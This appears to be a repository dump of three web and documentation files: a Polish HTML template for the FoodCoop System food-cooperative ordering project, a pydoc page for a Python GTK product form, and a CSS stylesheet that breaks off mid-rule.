<script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link rel="stylesheet" href="{{ site.url }}/components/highlightjs/styles/github.css" />
<link rel="alternate" type="application/atom+xml" href="{{ site.url }}/atom.xml" title="{{ site.title }} activity feed" />
<style>
/** quick fix because bootstrap <pre> has a background-color. */
pre code { background-color: inherit; }
</style>
</head>
<body>
<div class="wrapper">
<header>
<div class="navbar navbar-inverse navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
</a>
<a class="brand" href="{{ site.url }}/#home"><img src="/images/logo.png" alt="FoodCoop System"/></a>
<div class="nav-collapse collapse">
<ul class="nav">
<li><a href="{{ site.url }}/#about-system">Czym jest FCS?</a></li>
<li><a href="{{ site.url }}/#how-it-works">Jak to działa?</a></li>
<li><a href="{{ site.url }}/#help">Jak nam pomóc?</a></li>
<!-- <li><a href="{{ site.url }}/#news">Co nowego?</a></li>-->
<li><a href="{{ site.url }}/#about-team">Nasz zespół</a></li>
<!--<li><a href="http://foodcoopsystem.readthedocs.org/en/latest/">Dokumentacja</a></li>-->
</ul>
<ul class="social-icon">
<li class="facebook"><a target="_blank" rel="nofolow" href="https://www.facebook.com/foodcoopsystem">Facebook</a></li>
<li class="twitter"><a target="_blank" rel="nofolow" href="https://twitter.com/foodcoopsystem">Facebook</a></li>
<li class="google"><a target="_blank" rel="nofolow" href="https://plus.google.com/u/0/b/117350059508672336819/117350059508672336819/about">Google +</a></li>
</ul>
<ul class="lang">
<li><a href="{{ site.url }}/en/">ENG</a></li>
</ul>
</div><!--/.nav-collapse -->
</div>
</div>
</div>
</header>
<div class="container">
<a name="home"></a>
<h1 style="display: none;">FoodCoop System - System zamówień dla kooperatyw spożywczych i grup zakupowych.</h1>
<!-- Jssor Slider Begin -->
<!-- ================================================== -->
<div id="slider1" style="display: none; position: relative; margin: 0 auto; width: 2034px;
height: 1096px; overflow: hidden;">
<!-- Loading Screen -->
<div u="loading" style="position: absolute; top: 0px; left: 0px;">
<div style="filter: alpha(opacity=70); opacity:0.7; position: absolute; display: block;
background-color: #000; top: 0px; left: 0px;width: 100%; height:100%;">
</div>
<div style="position: absolute; display: block; background: url(/images/loading.gif) no-repeat center center;
top: 0px; left: 0px;width: 100%;height:100%;">
</div>
</div>
<!-- Slides Container -->
<div u="slides" style="cursor: move; position: absolute; left: 0px; top: 0px; width: 2034px; height: 1096px;
overflow: hidden;">
<div>
<!-- <span class="background-layer"></span>-->
<span class="logo-banner" ></span>
<h2 u="text" >Zdrowe warzywa od lokalnych rolników w dobrej cenie.</h2>
<img u="image" src2="/images/baner_img_01-t.jpg" />
</div>
<div>
<!-- <span class="background-layer"></span>-->
<h2 u="text" >Przyjazny system do wspomagania zamówień dla kooperatyw spożywczych i grup zakupowych.</h2>
<img u="image" src2="/images/baner_img_02-t.jpg" />
</div>
<div>
<!-- <span class="background-layer"></span>-->
<span class="logo-banner" ></span>
<h2 u="text" >Budowanie demokratycznego społeczeństwa przez kolektywne działanie.</h2>
<img u="image" src2="/images/baner_img_03-t.jpg" />
</div>
</div>
<!-- bullet navigator container -->
<div u="navigator" class="jssorb05" >
<!-- bullet navigator item prototype -->
<div u="prototype" style="POSITION: absolute; WIDTH: 15px; HEIGHT: 15px;"></div>
</div>
<a class="go-to-github" href="https://github.com/FoodCoopSystem">Dołącz do nas na GitHUB <i class="github"></i></a>
<a class="read-more" href="#about-system">Dowiedz się więcej</a>
<a class="go-to-about" href="#about-system"></a>
</div>
<!-- Jssor Slider End -->
</div>
<div class="container">
<div class="mainContent">
<div class="row-fluid">
<div class="span12">
<a name="about-system"></a>
<h2>Czym jest FoodCoop System?</h2>
<span class="subtext span12">
To otwarty i bezpłatny system wspomagania zamówień dla kooperatyw spożywczych oraz grup zakupowych.
</span>
</div>
</div>
<div class="row-fluid about">
<div class="col1 span4"><h4>Czym jest FoodCoop System?</h4><p>FoodCoop System to bezpłatny, oparty na idei Open Source
system służący do składania i rozliczania zamówień oraz ułatwiający organizację kooperatyw spożywczych i realizację
grupowych zakupów. Ma on także za zadanie wspierać lokalne rolnictwo poprzez popularyzację zakupów
lokalnych i sprawdzonych produktów rolniczych przez zorganizowane grupy konsumentów.
System umożliwi także dostęp konsumentom z miast do produktów lepszej jakości.</p>
</div>
<div class="col2 span4"><h4>Do kogo jest skierowany</h4><p>FoodCoop System skierowany jest dla kooperatyw spożywczych
oraz grup zakupowych z Polski jak również z poza kraju dlatego dostępna będzie polska i angielska wersja systemu.
Jeżeli prowadzisz kooperatywę i używacie zeszytu, excela lub podobnego narzędzia (albo miksu tych wariantów)
waszym rozwiązaniem na wszelkie problemy będzie wdrożenie systemu FoodCoop. Zapewni on zunifikowane i jednolite
zarządzanie wszystkimi zamówieniami.</p>
</div>
<div class="col3 span4"><h4>Idea projektu</h4><p>System rozwijany jest społecznie, częściowo przez wolontariuszy ale też przez
opłacaną pracę z różnego rodzaju dofinansowań i zbiórek. Pomoc użytkowników i finanse są niezbędne
by system działał lepiej. Każdy może właczyć się do tworzenia systemu nawet gdy nie posiada umiejętności
technicznych czy środków finansowych. To dobro wspólne za rozwój którego wszyscy jesteśmy odpowiedzialni!</p>
</div>
</div>
</div>
<!-- Jssor Slider Begin -->
<!-- You can move inline styles to css file or css block. -->
<!-- ================================================== -->
<div class="container">
<a name="how-it-works"></a>
<div id="slider2" style="display: none; position: relative; margin: 0 auto;
top: 0px; left: 0px; width: 2032px; height: 928px; overflow: hidden;">
<!-- Loading Screen -->
<div u="loading" style="position: absolute; top: 0px; left: 0px;">
<div style="filter: alpha(opacity=70); opacity: 0.7; position: absolute; display: block;
top: 0px; left: 0px; width: 100%; height: 100%;">
</div>
<div style="position: absolute; display: block; background: url(/images/loading.gif) no-repeat center center;
top: 0px; left: 0px; width: 100%; height: 100%;">
</div>
</div>
<!-- Slides Container -->
<div u="slides" style="cursor: move; position: absolute; left: 0px; top: 0px; width: 2032px; height: 928px; overflow: hidden;">
<div>
<span>
<img class="half" u="image" src2="/images/cechy_01-t.jpg" />
</span>
<div class="data half">
<image alt="Group buying" src="/images/icon_04.png" />
<h2>Organizacja grupowych zakupów.</h2>
<h5>Funkcje systemu</h5>
<ul>
<li>Składanie zamówień online</li>
<li>Rozliczanie złożonych zamówień</li>
<li>Zamówianie produktów na sztuki, kilogramy (min. 100 gram) </li>
<li>Grupowanie produktów w paczki </li>
<li>Możliwość płatnosci online </li>
</ul>
</div>
</div>
<div>
<span>
<img class="half" u="image" src2="/images/cechy_02-t.jpg" />
</span>
<div class="data half">
<image alt="Administration" src="/images/icon_05.png" />
<h2>Zarządzanie zakupami</h2>
<h5>Funkcje systemu</h5>
<ul>
<li>Szybka edycja dostępnej oferty</li>
<li>Prowadzenie magazynu i aktualizacja stanów magazynowaych</li>
<li>Wysyłanie zamówień do Rolnika/Dostawcy online</li>
<li>Historia zakupów kooperatywy/ grupy zakupowej, raporty</li>
<li>Obliczanie składek na fundusz gromadzki</li>
</ul>
</div>
</div>
<div>
<span>
<img class="half" u="image" src2="/images/cechy_03-t.jpg" />
</span>
<div class="data half">
<image alt="Mobility" src="/images/icon_06.png" />
<h2>Zamawiaj, zarządzaj i rozliczaj bez dostępu do komputera</h2>
<h5>Funkcje systemu</h5>
<ul>
<li>Możliwość wydruku list zamówionych produktów:
<ul>
<li>Listy produktów grupowane po osobie,</li>
<li>Listy do zamówienia grupowane do produkcie,</li>
<li>Listy produktów grupowane po dostawcy,</li></ul></li>
<li>Dostępność systemu na urządzeniach mobilnych</li>
</ul>
</div>
</div>
</div>
<!-- bullet navigator container -->
<div u="navigator" class="jssorb21">
<!-- bullet navigator item prototype -->
<div u="prototype" style="POSITION: absolute; WIDTH: 15px; HEIGHT: 15px;"></div>
</div>
<!-- Bullet Navigator Skin End -->
<!-- Arrow Left -->
<span u="arrowleft" class="jssora21l" style="top: 123px; left: 8px;">
</span>
<!-- Arrow Right -->
<span u="arrowright" class="jssora21r" style="top: 123px; right: 8px;">
</span>
</div>
<!-- Jssor Slider End -->
<h5>* Poznaj dokumentacje systemu i listę funkcjonalności:
<a href="http://foodcoopsystem.readthedocs.org/en/latest/">Dokumentacja</a></h5>
</div>
<div class="container mainContent">
<div class="row-fluid help-block">
<a name="help"></a>
<h2>Jak możesz nam pomóc?</h2>
<span class="subtext span12">
Ideą FoodCoop System jest popularyzacja kooperatyw spożywczych, dlatego chcemy by pozostał darmowy i dostępny dla każdego.
<br/>To dobro wspólne za rozwój którego wszyscy jesteśmy odpowiedzialni.
</span>
</div>
<div class="row-fluid">
<div class="col1 span4 help"><h4>Udział w zbiórce pieniędzy</h4><p>Chcemy stworzyć bezpłatne ale też nowoczesne i profesjonalne oprogramowanie.
Cześć z nas pracuje nad projektem społecznie jednak potrzebujemy Twojego wsparcia aby opłacić pracę doświadczonych specjalistów.
Zapewni to realizację projektu na wysokim poziomie w stosunkowo krótkim czasie.</p>
<p>Wesprzyj nas finansowo na polak potrafi (już niebawem ruszy nasza kampania)!</p>
</div>
<div class="col2 span4 help"><h4>Promocja w mediach społecznościowych</h4><p>Pomóż nam promować FoodCoop System wśród znajomych.
Polub naszą stronę na Facebooku, Google+, Twitterze i poleć ją swoim znajomym. Im więcej osób dowie się o naszym projekcie,
tym większa szansa na jego szybką realizację. Masz znajomych w mediach? Poinformuj ich o naszym projekcie i dostarcz im tym
samym ciekawego tematu na tekst lub reportaż.</p>
</div>
<div class="col3 span4 help"><h4>Udział w rozwoju projektu na GitHUB</h4><p>System napisany jest w języku PHP i oparty jest o platformę
Drupal Commerce. Praca nad nim jest dostępna publicznie i każdy może zgłaszać błędy lub dodawać własne propozycję.
Można nam pomóc w pracach związanych z programowaniem, testowaniem i tworzeniu dokumentacji systemu oraz tłumaczeniem tekstów.
Przyłącz się do projektu na <a href="https://github.com/FoodCoopSystem">GitHUB.</a></p>
</div>
</div>
</div>
<!--NEWS-->
<div class="container news">
<span class="background-layer"></span>
<div class="mainContent">
<div class="row-fluid">
<a name="news"></a>
<h2>Co nowego?</h2>
<span class="subtext span12">
Jesteśmy w trakcie przygotowania kampanii crowdfundingowej, już wkrótce ogłosimy jej szczegóły!
</span>
<!-- {% block content_wrapper %}{% block content %}{% endblock %}{% endblock %}-->
</div>
</div>
</div>
<div class="team-wrapper">
<!-- NAS ZESPOL -->
<div class="mainContent">
<div class="row-fluid team">
<a name="about-team"></a>
<h2>Nasz zespół</h2>
<span class="subtext span12">
Mamy różne doświadczenia i specjalizację. Łączy nas chęć stworzenia otwartego oprogramowania dla popularyzacja
idei kooperatyw spożywczych i umożliwienie łatwego dostępu do zdrowej żywności bezpośrednio od lokalnych rolników.
</span>
</div>
<div class="container-fluid team-list">
<div class="span3 people marzena">
<div class="image">
<img src="/images/people/marzena.jpg" />
<span class="dziubek"></span>
<h4>Marzena Gawrońska</h4>
</div>
<div class="text">
<span class="dziubek"></span>
<h4>Marzena Gawrońska</h4>
<p>Od ponad 5 lat pracuję niezależnie jako web&graphic designer. Lubię wyzwania i ciekawe projekty. Moje nieustanne dążenie do perfekcji i ciągłe doskonalenie własnych umiejętności graficznych potrafi być udręką dla kooperatystów z którymi współpracuję. FoodCoop System to projekt, z którego ideą w pełni się utożsamiam dlatego tez chętnie w nim uczestniczę. Zdrowe i tanie warzywa od rolników dla każdego!
</p>
</div>
</div>
<div class="span3 people karol">
<div class="image">
<img src="/images/people/karol.jpg" />
<span class="dziubek"></span>
<h4>Karol Bryksa</h4>
</div>
<div class="text">
<span class="dziubek"></span>
<h4>Karol Bryksa</h4>
<p> Współzałozyciel kooperatywy freelancerów Ratio Web, programista, aktywny uczestnik społeczności CMS Drupal,
współorganizator hackathonów i konferencji<br/>
Współtworzyłem pierwszą wesje systemu i uważam, że FoodCoop System pomoże w popularyzacji ruchu kooperatyw
spożywczych, który jest potrzebny do zachowania zrównoważonego rolnictwa i dostępu do lokalnych produktów w miastach.
</p>
</div>
</div>
<div class="span3 people tomek">
<div class="image">
<img src="/images/people/tomek.jpg" />
<span class="dziubek"></span>
<h4>Tomasz Sikora</h4>
</div>
<div class="text">
<span class="dziubek"></span>
<h4>Tomasz Sikora</h4>
<p>Współtwórca pierwszej nowoczesnej kooperatywy spożywczej w Polsce.
Pasjonuje się spółdzielczością i tworzeniem alternatywnych rozwiązań społeczno-gospodarczych.
Gdy nie próbuje zmienić świata zajmuje się muzyką rockową i miejskim ogrodnictwem.
„Działam w Food Coop System bo wierzę, że to narzędzie informatyczne znacznie przyśpieszy rozwój
nowych kooperatyw spożywczych
</p>
</div>
</div>
<div class="span3 people jarek">
<div class="image">
<img src="/images/people/jarek.jpg" />
<span class="dziubek"></span>
<h4>Jarosław Sobiecki</h4>
</div>
<div class="text">
<span class="dziubek"></span>
<h4>Jarosław Sobiecki</h4>
<p>Jestem wieloletnim programistą aplikacji internetowych, bazujących głównie na Drupalu. Wraz z Karolem i Marzeną współtworzymy kooperatywę Ratio Web.
Jestem fanem rozwiązań open source, zwłaszcza takich które w pozytywny sposób zmieniają życie ludzi.
Takim projektem jest właśnie FoodCoop System!
</p>
</div>
</div>
<div class="span3 people piotrek">
<div class="image">
<img src="/images/people/piotrek.jpg" />
<span class="dziubek"></span>
<h4>Piotr Sobieszczański</h4>
</div>
<div class="text">
<span class="dziubek"></span>
<h4>Piotr Sobieszczański</h4>
<p>Strony internetowe tworzę od tak dawna, że już prawie nie pamiętam kiedy zrobiłem ta pierwszą. Jeszcze dłużej fascynują mnie rozwiązania, które są tworzone wspólnie przez i dla wolnych społeczności (open source). Pomysł systemu foodcoop zrobił na mnie na tyle duże wrażenie, że po niedługim czasie stałem się jednym z członków zespołu. Poza tym staram się wygospodarować czas na inne ciekawe projekty nie zapominając o tym, że muszę zarobić jeszcze na życie. Po pracy odpracowuję zaległości w fizyce mojego ciała i połączenia socjalnie miedzy znajomymi.</p>
</div>
</div>
<div class="span3 people" id="join-us">
<div class="center">
<a class="button" href="mailto:kontakt@foodcoop.pl?Subject=Chcę%20dołączyć">Dołącz do nas</a>
</div>
<div class="join-link">
<p>Napisz do nas <a href="mailto:kontakt@foodcoop.pl?Subject=Chcę%20dołączyć" target="_top">email</a> z informacja co byś chciał/ła robić w projekcie.</p>
</div>
</div>
</div>
</div>
</div>
<!-- <div class="push"></div>-->
</div>
<footer class="container">
<div class="container-fluid footer">
<div class="copy span4">
contact @ foodcoop.pl<br/>
© {{ "now"|date("Y") }} {{ site.title }}
</div>
<aside class="span8 find">
<h2> Znajdziesz nas tu: </h2>
<ul class="sovial-icon">
<li class="facebook"><a target="_blank" rel="nofolow" href="https://www.facebook.com/foodcoopsystem">Facebook</a></li>
<li class="twitter"><a target="_blank" rel="nofolow" href="https://twitter.com/foodcoopsystem">Facebook</a></li>
<li class="google"><a target="_blank" rel="nofolow" href="https://plus.google.com/u/0/b/117350059508672336819/117350059508672336819/about">Google +</a></li>
</ul>
</aside>
</div>
</footer>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script>window.jQuery || document.write('<script src="{{ site.url }}/components/jquery/jquery.min.js"><\/script>')</script>
<script src="{{ site.url }}/components/bootstrap/js/bootstrap.min.js"></script>
{% block scripts %}
{% endblock %}
{% if site.google_analytics_tracking_id %}
<script type="text/javascript">
(function (i, s, o, g, r, a, m) {
i['GoogleAnalyticsObject'] = r;
i[r] = i[r] || function () {
(i[r].q = i[r].q || []).push(arguments)
}, i[r].l = 1 * new Date();
a = s.createElement(o),
m = s.getElementsByTagName(o)[0];
a.async = 1;
a.src = g;
m.parentNode.insertBefore(a, m)
})(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');
ga('create', '{{site.google_analytics_tracking_id}}', 'auto');
ga('send', 'pageview');
</script>
{% endif %}
<script src="{{ site.url }}/components/highlightjs/highlight.pack.js"></script>
<script src="{{ site.url }}/js/slider/jssor.slider.mini.js"></script>
<script src="{{ site.url }}/js/foodcoop-page.min.js"></script>
<script>hljs.initHighlightingOnLoad();</script>
</body>
</html>
|
doc/pydoc/productos_de_venta_especial.html | pacoqueen/ginn |
<!doctype html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: module productos_de_venta_especial</title>
</head><body bgcolor="#f0f0f8">
<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="#7799ee">
<td valign=bottom> <br>
<font color="#ffffff" face="helvetica, arial"> <br><big><big><strong>productos_de_venta_especial</strong></big></big></font></td
><td align=right valign=bottom
><font color="#ffffff" face="helvetica, arial"><a href=".">index</a><br><a href="file:/home/queen/Q-INN/geotexan/geotexinn02/formularios/productos_de_venta_especial.py">/home/queen/Q-INN/geotexan/geotexinn02/formularios/productos_de_venta_especial.py</a></font></td></tr></table>
<p><tt># -*- coding: utf-8 -*-</tt></p>
<p>
<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="#aa55cc">
<td colspan=3 valign=bottom> <br>
<font color="#fffff" face="helvetica, arial"><big><strong>Modules</strong></big></font></td></tr>
<tr><td bgcolor="#aa55cc"><tt> </tt></td><td> </td>
<td width="100%"><table width="100%" summary="list"><tr><td width="25%" valign=top><a href="gtk.html">gtk</a><br>
<a href="os.html">os</a><br>
</td><td width="25%" valign=top><a href="pclases.html">pclases</a><br>
<a href="pygtk.html">pygtk</a><br>
</td><td width="25%" valign=top><a href="sqlobject.html">sqlobject</a><br>
<a href="sys.html">sys</a><br>
</td><td width="25%" valign=top><a href="time.html">time</a><br>
<a href="utils.html">utils</a><br>
</td></tr></table></td></tr></table><p>
<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="#ee77aa">
<td colspan=3 valign=bottom> <br>
<font color="#ffffff" face="helvetica, arial"><big><strong>Classes</strong></big></font></td></tr>
<tr><td bgcolor="#ee77aa"><tt> </tt></td><td> </td>
<td width="100%"><dl>
<dt><font face="helvetica, arial"><a href="ventana.html#Ventana">ventana.Ventana</a>
</font></dt><dd>
<dl>
<dt><font face="helvetica, arial"><a href="productos_de_venta_especial.html#ProductosDeVentaEspecial">ProductosDeVentaEspecial</a>
</font></dt></dl>
</dd>
</dl>
<p>
<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="#ffc8d8">
<td colspan=3 valign=bottom> <br>
<font color="#000000" face="helvetica, arial"><a name="ProductosDeVentaEspecial">class <strong>ProductosDeVentaEspecial</strong></a>(<a href="ventana.html#Ventana">ventana.Ventana</a>)</font></td></tr>
<tr><td bgcolor="#ffc8d8"><tt> </tt></td><td> </td>
<td width="100%">Methods defined here:<br>
<dl><dt><a name="ProductosDeVentaEspecial-__init__"><strong>__init__</strong></a>(self, objeto<font color="#909090">=None</font>, usuario<font color="#909090">=None</font>)</dt><dd><tt>Constructor. objeto puede ser un objeto de pclases con el que<br>
comenzar la ventana (en lugar del primero de la tabla, que es<br>
el que se muestra por defecto).</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-activar_widgets"><strong>activar_widgets</strong></a>(self, s, chequear_permisos<font color="#909090">=True</font>)</dt><dd><tt>Activa o desactiva (sensitive=True/False) todos <br>
los widgets de la ventana que dependan del <br>
objeto mostrado.<br>
Entrada: s debe ser True o False. En todo caso<br>
se evaluará como boolean.</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-add_campoesp"><strong>add_campoesp</strong></a>(self, w)</dt></dl>
<dl><dt><a name="ProductosDeVentaEspecial-aviso_actualizacion"><strong>aviso_actualizacion</strong></a>(self)</dt><dd><tt>Muestra una ventana modal con el mensaje de objeto <br>
actualizado.</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-borrar_producto"><strong>borrar_producto</strong></a>(self, widget)</dt><dd><tt>Elimina el producto de la tabla pero NO<br>
intenta eliminar ninguna de sus relaciones,<br>
de forma que si se incumple alguna <br>
restricción de la BD, cancelará la eliminación<br>
y avisará al usuario.</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-buscar_cod_libre"><strong>buscar_cod_libre</strong></a>(self)</dt><dd><tt>Devuelve un código de tres cifras como <br>
cadena que no esté ya en la tabla de <br>
productos como producto terminado.<br>
Siempre devolverá el primer código<br>
libre más cercano a 000.<br>
Si no quedan más mostrará un mensaje<br>
de error por pantalla y devolverá<br>
999.</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-buscar_producto"><strong>buscar_producto</strong></a>(self, widget)</dt><dd><tt>Muestra una ventana de búsqueda y a continuación los<br>
resultados. El objeto seleccionado se hará activo<br>
en la ventana a no ser que se pulse en Cancelar en<br>
la ventana de resultados.</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-calcular_digitoc"><strong>calcular_digitoc</strong></a>(self, cod)</dt></dl>
<dl><dt><a name="ProductosDeVentaEspecial-change_campoesp"><strong>change_campoesp</strong></a>(self, w)</dt></dl>
<dl><dt><a name="ProductosDeVentaEspecial-crear_nuevo_producto"><strong>crear_nuevo_producto</strong></a>(self, widget)</dt><dd><tt>Función callback del botón b_nuevo.<br>
Pide los datos básicos para crear un nuevo objeto.<br>
Una vez insertado en la BD hay que hacerlo activo<br>
en la ventana para que puedan ser editados el resto<br>
de campos que no se hayan pedido aquí.</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-drop_campoesp"><strong>drop_campoesp</strong></a>(self, w)</dt></dl>
<dl><dt><a name="ProductosDeVentaEspecial-es_diferente"><strong>es_diferente</strong></a>(self)</dt><dd><tt>Devuelve True si la información en pantalla es distinta a la<br>
del objeto en memoria.</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-generar_codigo_ean"><strong>generar_codigo_ean</strong></a>(self)</dt><dd><tt>Genera un código EAN-13 completo, dígito control<br>
incluido, dentro del rango asignado a Geotexan.</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-guardar"><strong>guardar</strong></a>(self, widget)</dt><dd><tt>Guarda el contenido de los entry y demás widgets de entrada<br>
de datos en el objeto y lo sincroniza con la BD.</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-inicializar_ventana"><strong>inicializar_ventana</strong></a>(self)</dt><dd><tt>Inicializa los controles de la ventana, estableciendo sus<br>
valores por defecto, deshabilitando los innecesarios,<br>
rellenando los combos, formateando el TreeView -si lo hay-...</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-ir_a_anterior"><strong>ir_a_anterior</strong></a>(self, widget)</dt><dd><tt>Hace que el registro anterior (ordenados por ID interno)<br>
sea el objeto activo</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-ir_a_primero"><strong>ir_a_primero</strong></a>(self)</dt><dd><tt>Hace que el primer registro -si lo hay- de la tabla implicada<br>
en el objeto del formulario sea el objeto activo.</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-ir_a_siguiente"><strong>ir_a_siguiente</strong></a>(self, widget)</dt><dd><tt>Hace que el siguiente registro (ordenados por ID interno)<br>
sea el objeto activo</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-mostrar_especificos"><strong>mostrar_especificos</strong></a>(self)</dt><dd><tt>Muestra los datos específicos del producto.<br>
Elimina los hijos que componen la tabla <br>
antes de insertar los nuevos.</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-refinar_resultados_busqueda"><strong>refinar_resultados_busqueda</strong></a>(self, resultados)</dt><dd><tt>Muestra en una ventana de resultados todos los<br>
registros de "resultados".<br>
Devuelve el id (primera columna de la ventana<br>
de resultados) de la fila seleccionada o None<br>
si se canceló.</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-rellenar_tabla_tarifas"><strong>rellenar_tabla_tarifas</strong></a>(self)</dt></dl>
<dl><dt><a name="ProductosDeVentaEspecial-rellenar_widgets"><strong>rellenar_widgets</strong></a>(self)</dt><dd><tt>Introduce la información del producto actual<br>
en los widgets.<br>
No se chequea que sea != None, así que<br>
hay que tener cuidado de no llamar a <br>
esta función en ese caso.</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-seleccionar_campoesp"><strong>seleccionar_campoesp</strong></a>(self, campos)</dt></dl>
<dl><dt><a name="ProductosDeVentaEspecial-ver_tarifas"><strong>ver_tarifas</strong></a>(self, w)</dt></dl>
<hr>
Methods inherited from <a href="ventana.html#Ventana">ventana.Ventana</a>:<br>
<dl><dt><a name="ProductosDeVentaEspecial-abrir_gajim"><strong>abrir_gajim</strong></a>(self)</dt><dd><tt>Calcado de menu.py. Sólo lleva las modificaciones necesarias para hacerlo funcionar desde aquí.</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-acerca_de"><strong>acerca_de</strong></a>(self)</dt><dd><tt>Calcado de menu.py. Modificado ligeramente para hacerlo funcionar aquí.</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-actualizar_objeto_y_enlaces"><strong>actualizar_objeto_y_enlaces</strong></a>(self, actualizar_ventana_tambien<font color="#909090">=True</font>)</dt></dl>
<dl><dt><a name="ProductosDeVentaEspecial-actualizar_ventana"><strong>actualizar_ventana</strong></a>(self, widget<font color="#909090">=None</font>, objeto_anterior<font color="#909090">=None</font>)</dt><dd><tt>Actualiza el contenido de los controles de la ventana<br>
para que muestren todos los datos del objeto actual.<br>
widget no se usa. Se recibe para el caso en que se llama a <br>
la función desde un botón.<br>
objeto_anterior es un objeo de pclases. Sería el que se <br>
muestra en pantalla justo antes de llamar a actualizar_ventana<br>
y recargar los datos. Si se recibe y hay cambios pendientes de<br>
guardar, el contenido de la ventana se guarda en ese objeto<br>
ANTES de mostrar el nuevo (o el mismo con nueva información) <br>
en los widgets de pantalla.</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-add_connections"><strong>add_connections</strong></a>(self, dict)</dt><dd><tt>Recorre el diccionario y crea las conexiones con <br>
los callbacks.</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-build_menu_superior"><strong>build_menu_superior</strong></a>(self)</dt><dd><tt>Construye un menú con las mismas opciones que el menú principal.</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-check_permisos"><strong>check_permisos</strong></a>(self, nombre_fichero_ventana)</dt><dd><tt>Activa o desactiva los controles dependiendo de los <br>
permisos del usuario.</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-chequear_cambios"><strong>chequear_cambios</strong></a>(self)</dt><dd><tt>Activa el botón «Guardar» si hay cambios los datos.<br>
El botón se debe llamar "b_guardar" y el método para <br>
verificar los cambios "es_diferente" o no funcionará.</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-chequear_hilo"><strong>chequear_hilo</strong></a>(self)</dt><dd><tt>Consulta el hilo notificador del objeto actual.<br>
En realidad es una mera excusa para obligar a GTK a <br>
atender al objeto lo antes posible en caso de <br>
notificación.</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-ir_a"><strong>ir_a</strong></a>(self, objeto)</dt></dl>
<dl><dt><a name="ProductosDeVentaEspecial-make_connections"><strong>make_connections</strong></a>(self)</dt><dd><tt>Realiza las conexiones básicas entre widgets y callbacks.<br>
Para el resto de conexiones, usar add_connections.<br>
La ventana principal DEBE llamarse "ventana".</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-make_funciones_ociosas"><strong>make_funciones_ociosas</strong></a>(self)</dt><dd><tt>Inicia las funciones ociosas de chequeo de cambios<br>
remotos (actualizar) y locales (guardar).</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-salir"><strong>salir</strong></a>(self, boton, event<font color="#909090">=None</font>, mostrar_ventana<font color="#909090">=True</font>)</dt><dd><tt>Muestra una ventana de confirmación y <br>
sale de la ventana cerrando el bucle<br>
local de gtk_main.<br>
Si mostrar_ventana es False, sale directamente<br>
sin preguntar al usuario.</tt></dd></dl>
<dl><dt><a name="ProductosDeVentaEspecial-volver_a_cursor_original"><strong>volver_a_cursor_original</strong></a>(self)</dt><dd><tt>Calcado de menu.py. Sólo lleva las modificaciones necesarias para hacerlo funcionar desde aquí.</tt></dd></dl>
</td></tr></table></td></tr></table>
</body></html> |
t3-assets/dev/templates.providores.less.style.less.css | Quartermain/providores |
.t3-header {
padding-top: 20px;
padding-bottom: 20px;
}
.logo {
float: left;
}
.logo a {
display: inline-block;
line-height: 1;
margin: 0;
}
.logo-image {
text-align: center;
}
.logo-image a {
background-image: url("../../templates/providores/images/logo.png");
background-repeat: no-repeat;
width: 305px;
height: 130px;
}
.logo-image span,
.logo-image small {
display: none;
}
.logo-text a {
color: #444;
text-decoration: none;
font-size: 17.5px;
}
.logo-text:hover a,
.logo-text a:hover,
.logo-text a:active,
.logo-text a:focus {
text-decoration: none;
}
.logo-text .site-slogan {
display: block;
font-size: 14px;
margin-top: 5px;
}
.head-search {
float: right;
margin-top: 20px;
}
.head-search .custom {
clear: both;
padding-top: 10px;
}
.head-search .mijosearch_clear {
display: none;
}
.head-search form {
margin: 0;
float: right;
}
.head-search label {
display: none;
}
.head-search .input {
background: url("../../templates/providores/images/ico/search-invert.png") no-repeat 8px center;
width: 120px;
padding-left: 26px;
}
.head-search .input:focus {
color: #444;
width: 180px;
}
.t3-sl {
padding-bottom: 60px;
padding-top: 60px;
}
.t3-mainbody {
padding-bottom: 40px;
padding-top: 40px;
}
.t3-footer {
background: #1f1f1f;
color: #ffffff;
*zoom: 1;
}
.t3-footer:before,
.t3-footer:after {
display: table;
content: "";
line-height: 0;
}
.t3-footer:after {
clear: both;
}
.t3-footer small {
display: block;
font-size: 100%;
}
.t3-footer a {
color: #ffffff;
font-size: 14px;
}
.t3-footer a:hover,
.t3-footer a:active,
.t3-footer a:focus {
